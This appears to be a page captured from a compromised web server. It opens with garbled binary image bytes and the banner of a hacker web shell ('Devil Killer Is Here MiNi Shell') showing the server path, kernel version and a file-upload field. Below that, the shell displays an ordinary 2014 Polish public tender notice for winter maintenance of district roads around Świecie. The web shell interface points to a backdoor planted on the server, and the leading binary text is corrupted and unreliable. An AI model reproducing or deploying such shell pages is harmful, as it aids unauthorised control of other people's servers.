JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141015/217469-N-2014.html

<p class="kh_header"><b>Świecie: Zimowe utrzymanie dróg powiatowych administrowanych przez PZD Świecie 
- z podziałem na 7 zadań w sezonie 2014/2015</b><br>
<b>Numer ogłoszenia: 217469 - 2014; data zamieszczenia: 15.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg , ul. Gen. Józefa Hallera 9, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 56 83 224, faks 52 56 83 229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.swiecki.lo.pl/?cid=207</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg powiatowych administrowanych przez PZD Świecie 
- z podziałem na 7 zadań w sezonie 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zimowe utrzymanie dróg powiatowych                         w standardzie II i V na terenie Powiatu Świeckiego sprzętem będącym w posiadaniu Wykonawcy w sezonie 2014/2015 i materiałem do zwalczania śliskości własność Wykonawcy, podzielone na 7 zadań.

Opis II i V standardu zimowego utrzymania dróg powiatowych na terenie Powiatu Świeckiego:

- Standard II zimowego utrzymania dróg powiatowych:
Odśnieżanie: odśnieżanie na całej szerokości i długości drogi. Dopuszczalne jest (po ustaniu opadów śniegu) występowanie luźnego śniegu przez 4 godz. lub błota pośniegowego przez 6 godz. oraz cienkiej warstwy zajeżdżonego śniegu nie utrudniającego ruchu pojazdów
Zwalczanie śliskości zimowej: posypywanie jezdni mieszaniną piaskowo - solną na całej długości drogi. Do powierzchni dotyczących usuwania śliskości nie wlicza się poboczy umocnionych. W przypadku zaistnienia innych zjawisk czas ich likwidacji jest następujący: gołoledź, szron, szadź - 3 godz.; śliskość pośniegowa, lodowica - 4 godz.
Mieszanina piaskowo - solna powinna być komponowana w następujący sposób:
30% soli drogowej, 70% piasek. 

- Standard V zimowego utrzymania dróg powiatowych:
Odśnieżanie: odśnieżanie jezdni drogi w miejscach zasp oraz co najmniej jednego pasa ruchu z wykonaniem mijanek. Luźny śnieg może zalegać na jezdni do 16 godz. Może też być on zajeżdżony lub może wystąpić nabój śnieżny. W przypadku zasp należy je usunąć w ciągu 24 godzin od wystąpienia zjawiska. Dopuszcza się przerwy  w komunikacji PKS.
Zwalczanie śliskości zimowej: posypywanie jezdni mieszaniną piaskowo - solną na wyznaczonych przez Zamawiającego odcinkach dróg oznaczonych palikami na początku i na końcu posypania odcinka drogi (łuki poziome i pionowe o nachyleniu co najmniej 4%) oraz na skrzyżowaniach dróg, skrzyżowaniach dróg z liniami kolejowymi, zatokach autobusowych, wiaduktach i mostach. Do likwidacji gołoledzi           i śliskości pośniegowej  należy przystąpić najpóźniej w ciągu 8 godzin od wystąpienia zjawiska.
Mieszanina piaskowo - solna powinna być komponowana w następujący sposób:
30% soli drogowej, 70% piasek. 

Określenia podstawowe:
Śnieg luźny - nieusunięty lub pozostały na nawierzchni po przejściu pługów śnieg, który nie został zagęszczony pod wpływem ruchu kołowego.
Śnieg zajeżdżony - nieusunięty lub pozostały na nawierzchni po przejściu pługów śnieg, który został zagęszczony, ale nie stał się zlodowaciały.
Nabój śnieżny - nieusunięta zlodowaciała lub ubita warstwa śniegu o znacznej grubości (od kilku centymetrów), przymarznięta do nawierzchni jezdni.
Błoto pośniegowe - topniejący śnieg pozostały na nawierzchni po przejściu pługów i posypaniu jej środkami chemicznymi.
Gołoledź - cienka warstwa lodu grubości do 1 mm powstała na skutek opadu na nawierzchnię o temperaturze ujemnej, mgły roszącej, mżawki lub deszczu.
Lodowica - warstwa lodu o grubości do kilku  centymetrów, powstała z zamarzniętej, nie usuniętej z nawierzchni wody, pochodzącej ze stopnienia śniegu, lodu lub opadu deszczu.
Szron - osad lodu, na ogół o wyglądzie krystalicznym, przybierający kształt lasek, igiełek itp., tworzący się w procesie bezpośredniej kondensacji pary wodnej z powietrza przy temperaturze poniżej 0°C.
Śliskość pośniegowa - rodzaj śliskości zimowej, powstającej w wyniku zalegania na jezdni przymarzniętej do nawierzchni pozostałości nie usuniętego ubitego śniegu, pokrywającego ją całkowicie lub częściowo warstewką o grubości kilku milimetrów.
Szadź - osad atmosferyczny utworzony z ziarenek lodu rozdzielonych pęcherzykami powietrza, powstający z nagłego zamarzania przechłodzonych kropelek wody (mgły lub chmury), gdy temperatura wyziębionych powierzchni jest niższa lub nieznacznie wyższa od 0°C.

Zimowe utrzymanie dróg powiatowych w standardzie II i V na terenie Powiatu Świeckiego podzielone zostało na 7 zadań. Mapa wszystkich zadań z podziałem na standardy zimowego utrzymania dróg stanowi załącznik nr 8 do SIWZ.
- Zadanie nr 1: 

ZADANIE NR 1

II	1298C	Drzycim  stacja kolejowa -
 - droga nr 239	0+000 	0+980	
II	1242C	Drzycim - Sulnówko - Świecie	0+000  	9+132	
II	1213C	Osie stacja kolejowa - Drzycim	3+932 	4+892	
II	1225C	Żur - Krąplewice	0+000 	6+667	
V	1213C	Osie stacja kolejowa - Drzycim	4+892	10+922	
V	1215C	Wałkowiska - Jeżewo	1+862	14+429	

 *Wyznaczone do posypywania łuki poziome i pionowe o nachyleniu co najmniej 4%                                                                                            
V	1213C	Osie stacja kolejowa - Drzycim 
m. Drzycim 	10+222	10+922	
V	1215C	Wałkowiska - Jeżewo
m. Brzeziny	3+400	3+800	
V	1215C	Wałkowiska - Jeżewo
m. Brzeziny	4+300	4+700	
V	1215C	Wałkowiska - Jeżewo
m. Jaszcz	6+500	7+750	

- Zadanie nr 2: 

II	1203C	Tleń - Osie	0+000 	5+704	
II	1211C	Tleń - Lniano	0+000  	0+837	
II	1213C	Osie stacja kolejowa - Drzycim	0+000	3+932	
II	1015C	Tuchola - Tleń	21+512 	27+979	

V	1005C	(Czersk) - gr. woj. - Śliwice-Łążek - Tleń	24+364	29+928	
V	1211C	Tleń - Lniano	0+837	11,229	
V	1212C	Brzemiona - Drzycim	0+000	8+477	
*Wyznaczone do posypywania łuki poziome i pionowe o nachyleniu co najmniej 4%                                                                                            
1005C	(Czersk) - gr. woj. - Śliwice-Łążek - Tleń
m. Łążek	24+400	25+200	
1005C	(Czersk) - gr. woj. - Śliwice-Łążek - Tleń
m. Tleń	28+550	29+550	
1211C	Tleń - Lniano
m. Żydzia	2+250	3+500	
1211C	Tleń - Lniano
m. Brzemiona	6+250	6+750	
1211C	Tleń - Lniano
m. Mszano	7+050	7+500	
1212C	Brzemiona - Drzycim
m. Sierosław	2+900	3+900	

- ZADANIE NR 3
II	1286C	Morsk - Świecie - Dworzysko	0+000 	9+497	
II	1285C	Dworzysko - Topolno	0+000  	5+200	
II	1252C	Jeżewo - Świecie     ul. Jesionowa		12+509	1,339
II	1289C	Świecie - Głogówko Królewskie	0+000 	4+588	
II	1242C	Drzycim - Sulnówko - Świecie	9+132	15+924	
II	1260C	Kozłowo - Przechowo          ul. Sportowa	0+000	2+870	
V	1285C	Dworzysko - Topolno	5+200	11+157	
V	1290C	Głogówko - rz. Wisła	0+000	1+095	
V	1291C	Terespol stacja kolejowa - droga nr 240	0+000	1+631	
V	1292C	Wyrwa - Konopat Polski - Drozdowo	0+000	4+550	
V	1293C	Polski Konopat - Terespol	0+000	1+518	

*Wyznaczone do posypywania łuki poziome i pionowe o nachyleniu co najmniej 4%                                                                                            
V	1293C	Polski Konopat - Terespol
m. Terespol           	0+800	1+500	
V	1292C	Wyrwa - Konopat Polski - Drozdowo	0+900	1+100	

- Zadanie nr 4: 

ul. Wojska Polskiego	18 200
ul. Bydgoska	172
ul. Mickiewicza	2 248
ul. Mostowa	1 032
ul. Sienkiewicza	2 052


Zadanie nr 5: 

II	1218C	Nowe - Tryl - Wielki Lubień	0+000 	14+988
V	1219C	Nowe - Komorsk - Wielki Lubień	0+000	16+097

Zadanie nr 6: 

II	1249C	Jeżewo - Piskarki - Sulnowo	0+000 	9+181
II	1252C	Jeżewo - Świecie	7+141  	11+170
II	1257C	Michale - Sartowice	12+603	15+603
II	1258C	Czaple - Wiąg	2+380	3+175
II	1259C	Sulnówko - Sulnowo	0+000 	1+605
V	1246C	Plewno-Belno	9+069	9+526
V	1247C	Bedlenki - Skarszewo	0+000	1+881
V	1250C	Belno - Czaple	0+000	4+275
V	1251C	Czaple - Czapelki	0+000	1+890
V	1252C	Jeżewo - Świecie	0+000	7+141
V	1255C	Święte - Grabowiec	0+000	1+650
V	1258C	Czaple - Wiąg	0+000	2+380
*Wyznaczone do posypywania łuki poziome i pionowe o nachyleniu co najmniej 4%
V	1252C	Jeżewo - Świecie              m. Jeżewo         	0+000	0+750

- Zadanie nr 7: 
II	1240C	Błądzim -  Łowin	0+000 	14+229
II	1266C	droga nr 56 - Serock - Łowin - Zbrachlin	6+700  	22+448
II	1271C	Pruszcz - Zawada	0+000	2+000
II	1272C	droga nr 1271 - Niewieścin	0+000	2+758
II	1263C	Świekatowo - Bukowiec	0+000 	4+000
II	1281C	Bukowiec - Gruczno	0+000	0+700
II	1281C	Bukowiec - Gruczno	6+083	9+583
II	1262C	Stacja kolejowa Bukowiec - droga nr 240	0+000	2+937
II	1279C	Bukowiec - Przysiersk	0+000	4+300
V	1282C	Stążki - Gruczno	0+000	11+092
V	1281C	Bukowiec - Gruczno	0+700	6+083
V	1284C	Pruszcz - Gruczno	8+407	8+907
*Wyznaczone do posypywania łuki poziome i pionowe o nachyleniu co najmniej 4%
V	1282C	Stążki - Gruczno                	10+100	10+800
V	1284	Pruszcz - Gruczno	8+407	8+907


* Zamawiający oznaczy palikami wyznaczone do posypywania miejsca łuków poziomych i pionowych o nachyleniu powyżej 4%. Pozostałe miejsca do posypywania - zgodnie z opisem V standardu zimowego utrzymania dróg powiatowych na terenie Powiatu Świeckiego.

Do odśnieżania dróg oraz zwalczania śliskości zimowej używany będzie sprzęt będący w posiadaniu Wykonawcy:
- podstawowy: piaskarki o ładowności 4-7 ton  z pługiem dociskowym,
- uzupełniający: koparko - ładowarki oraz pługi wirnikowe (zadanie nr 2 i 7).
Sprzęt uzupełniający będzie wspomagać akcję zimowego utrzymania dróg wyłącznie na wezwanie Zamawiającego.
Wykonawca zobowiązuje się, że w pojazdach, którymi zamierza wykonać przedmiot zamówienia (z wyjątkiem koparko - ładowarek oraz pługów wirnikowych), będzie możliwe zainstalowanie przez Zamawiającego systemu GPS, którego Wykonawca nie ma prawa w żaden sposób demontować, czy dokonywać jakiejkolwiek ingerencji, bez zgody Zamawiającego. W przypadku uszkodzenia, awarii, itp. winien niezwłocznie poinformować o tym fakcie Zamawiającego. Dodatkowo Wykonawca udostępni sprzęt do montażu i demontażu systemu GPS w terminie wskazanym przez Zamawiającego. 

Obowiązki Wykonawcy i Zamawiającego:
Wykonawca zobowiązany jest do:
- wyposażenia pojazdu i sprzętu biorącego udział przy akcji zimowego utrzymania 
w telefon komórkowy. Koszt utrzymania telefonu komórkowego ponosi Wykonawca,
- wyposażenia pojazdu i sprzętu biorącego udział przy akcji zimowego utrzymania 
w dodatkowe światła drogowe i mijania,
- wyposażenia pojazdu i sprzętu biorącego udział przy akcji zimowego utrzymania 
w światła pulsujące koloru pomarańczowego,
- wyposażenia pojazdu i sprzętu biorącego udział przy akcji zimowego utrzymania 
w światła obrysowe lemiesza,
- w przypadku awarii pojazdu lub sprzętu, zgłoszenia tego Zamawiającemu oraz zapewnienia odpowiedniego (równoważnego) pojazdu/sprzętu zastępczego w ciągu 6 godzin od chwili zgłoszenia awarii Zamawiającemu,
- gromadzenia miesięcznego zapasu materiałów (piasek, sól) na zabezpieczonych przez Wykonawcę placach składowych w miesiącu grudzień i styczeń w pozostałych miesiącach do gromadzenia dwutygodniowych zapasów,
- przeszkolenia pracowników w zakresie prowadzonych prac przy zimowym utrzymaniu dróg,
- zawarcie w ramach prowadzonej działalności gospodarczej umowy ubezpieczenia od odpowiedzialności cywilnej na czas realizacji usługi,
- podstawienia usprzętowionego pojazdu wraz z obsługą, zaopatrzonego na własny koszt w materiały pędne, nie później niż 0,5 godziny od chwili otrzymania wezwania, Wezwanie może nastąpić w ciągu całej doby.
- przygotowania w 100% oraz przedstawienia Zamawiającemu w ciągu 10 dni od daty podpisania umowy sprzętu, którym będzie dysponował podczas realizacji zamówienia zgodnie z wymaganiami Zamawiającego zawartymi w SIWZ.

Zamawiający zobowiązany jest do:
- bieżącego ustalenie zakresu działania Wykonawcy tj. wydawania dyspozycji co do miejsca i terminu każdorazowej usługi.

Podwykonawcy:
Wykonawca, który zamierza powierzyć podwykonawcom wykonanie jakiejkolwiek części zamówienia, zobowiązany jest wskazać na druku formularza ofertowego zakres zamówienia powierzany podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty, będzie uznawane za stwierdzenie samodzielnego wykonania zamówienia.

Zamawiający w trakcie realizacji zamówienia może dokonać kontroli wykonanych prac oraz sprzętu biorącego udział w zimowym utrzymaniu dróg powiatowych. W przypadku zastrzeżeń Zamawiającego co do jakości usługi w porównaniu do wymaganych standardów zimowego utrzymania  dróg powiatowych, Wykonawca na własny koszt powtórzy usługę do uzyskania danego standardu                 i akceptacji Zamawiającego. W przypadku zastrzeżeń Zamawiającego co do pojazdu-sprzętu biorącego udział w realizacji zamówienia w porównaniu do wymagań opisanych w SIWZ, Wykonawca w ciągu 12 godzin przedstawi Zamawiającemu dany pojazd-sprzęt zgodny z wymaganiami, w przeciwnym razie zapłaci Zamawiającemu kary umowne. 
    
Sprzątanie pozimowe obejmuje wyłącznie zadanie nr 3 i 4:
- zadanie nr 3 obejmuje pozimowe sprzątanie ulic na terenie miasta Świecie,
- zadanie nr 4 obejmuje pozimowe sprzątanie chodników.

Dodatkowe warunki:
Każdy z wykonawców na wezwanie Zamawiającego jest zobowiązany do wykorzystania sprzętu z zadań do akcji odśnieżania na drogach powiatowych całego powiatu świeckiego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 96.03.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponowanie  odpowiednim  potencjałem  technicznym  oraz  osobami  zdolnymi  do  wykonania zamówienia (sporządzony na formularzu zgodnym z treścią załącznika nr 4 do SIWZ)
Wykonawca musi dysponować potencjałem technicznym tj.:
a)	Zadanie nr 1.
Piaskarka o ładowności 4-7 ton  z pługiem dociskowym	- szt. 2
Koparko - ładowarka							- szt. 1
b)	Zadanie nr 2.
Piaskarka o ładowności 4-7 ton  z pługiem dociskowym	- szt. 2
Koparko - ładowarka							- szt. 1
Pług wirnikowy								- szt. 1
c)	Zadanie nr 3.
Piaskarka o ładowności 4-7 ton  z pługiem dociskowym	- szt. 3
Koparko - ładowarka							- szt. 1
d)	Zadanie nr 4.
Sprzęt niezbędny do prawidłowego zimowego utrzymania chodników w m. Świecie. 
e)	Zadanie nr 5.
Piaskarka o ładowności 4-7 ton  z pługiem dociskowym	- szt. 1
Koparko - ładowarka							- szt. 1
f)	Zadanie nr 6.
Piaskarka o ładowności 4-7 ton  z pługiem dociskowym	- szt. 2
Koparko - ładowarka							- szt. 1
g)	Zadanie nr 7.
Piaskarka o ładowności 4-7 ton  z pługiem dociskowym	- szt. 4
Koparko - ładowarka							- szt. 1
Pług wirnikowy								- szt. 1

Wymagania odnośnie pługów dociskowych:
- część robocza gumy lemiesza nie może być krótsza niż 5 cm</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie  zmiany  i  uzupełnienia  treści  umowy  wymagają  dla  swej  ważności formy pisemnej  w  postaci  aneksu  podpisanego  przez  obie  strony. Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość dokonania zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
Wszelkie  zmiany  i  uzupełnienia  treści  umowy  wymagają  dla  swej  ważności formy pisemnej  w postaci  aneksu  podpisanego  przez  obie  strony dotyczących w przypadku wystąpienia co najmniej jednej  z  okoliczności  wymienionych  poniżej,  z  uwzględnieniem  podawanych  warunków  ich wprowadzenia: 
- Zmiana terminu realizacji zamówienia w przypadku:  
a)  zlecanie  przez  Zamawiającego  prac  dodatkowych  jeżeli  terminy  ich  zlecenia,  rodzaj  lub  zakres uniemożliwiają  dotrzymanie  pierwotnego  terminu  zakończenia  realizacji  umowy,  a  których konieczności zlecenia Zamawiający nie mógł przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy;   
b)  prace  objęte  umową,  zostały  wstrzymane  przez  właściwy  organ,  co  uniemożliwia  terminowe zakończenie realizacji przedmiotu umowy; 
- Zmiana  podwykonawcy  -  na  pisemny  wniosek  Wykonawcy,  dopuszcza  się  zmianę podwykonawcy  lub  rezygnację  z  udziału  podwykonawcy  przy  realizacji  przedmiotu zamówienia.  Zmiana  może  nastąpić  wyłącznie  po  przedstawieniu  przez  Wykonawcę  oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu  zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego  Wykonawca  opierał  się  wykazując  spełnianie  warunków  udziału  w  postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w  zakresie  nie  mniejszym  niż  wskazane  na  etapie  postępowania  o  udzielenie  zamówienia  przez dotychczasowego  podwykonawcę.  Zmiany  podwykonawcy  można  dokonać  jedynie,  jeżeli wykonywanie części robót przez podwykonawcę zostało wskazane przez Wykonawcę w ofercie. W wypadku gdy Wykonawca nie wskaże w ofercie iż zamierza powierzyć część robót podwykonawcom, ich wprowadzenie na etapie wykonywania umowy jest niedopuszczalne. 
- Zmiana  osób  odpowiedzialnych  za  kontakty  i  nadzór  nad  przedmiotem  umowy,  których  nie można  było  przewidzieć  w  chwili  sporządzenia  niniejszej  specyfikacji  i  w  chwili  zawarcia  umowy,  a których zmiana ma bezpośredni wpływ na wykonanie umowy np. gdyby wskutek wydarzeń losowych osoby wskazane 
w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy; 
W  przypadku  osób  sprawujących  nadzór  nad  realizacją  umowy  ze  strony  Wykonawcy  zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana pisemnie przez  Zamawiającego. Zamawiający  zaakceptuje  zmianę    wyłącznie  wtedy,  gdy  kwalifikacje  i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy, a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy. 
- Zmiany  prowadzące  do  likwidacji  oczywistych  omyłek  pisarskich  i  rachunkowych  w  treści umowy. 
- Zmiany wynagrodzenia w przypadku: 
a) zmiany obowiązującej stawki podatku od towarów i usług (VAT); 
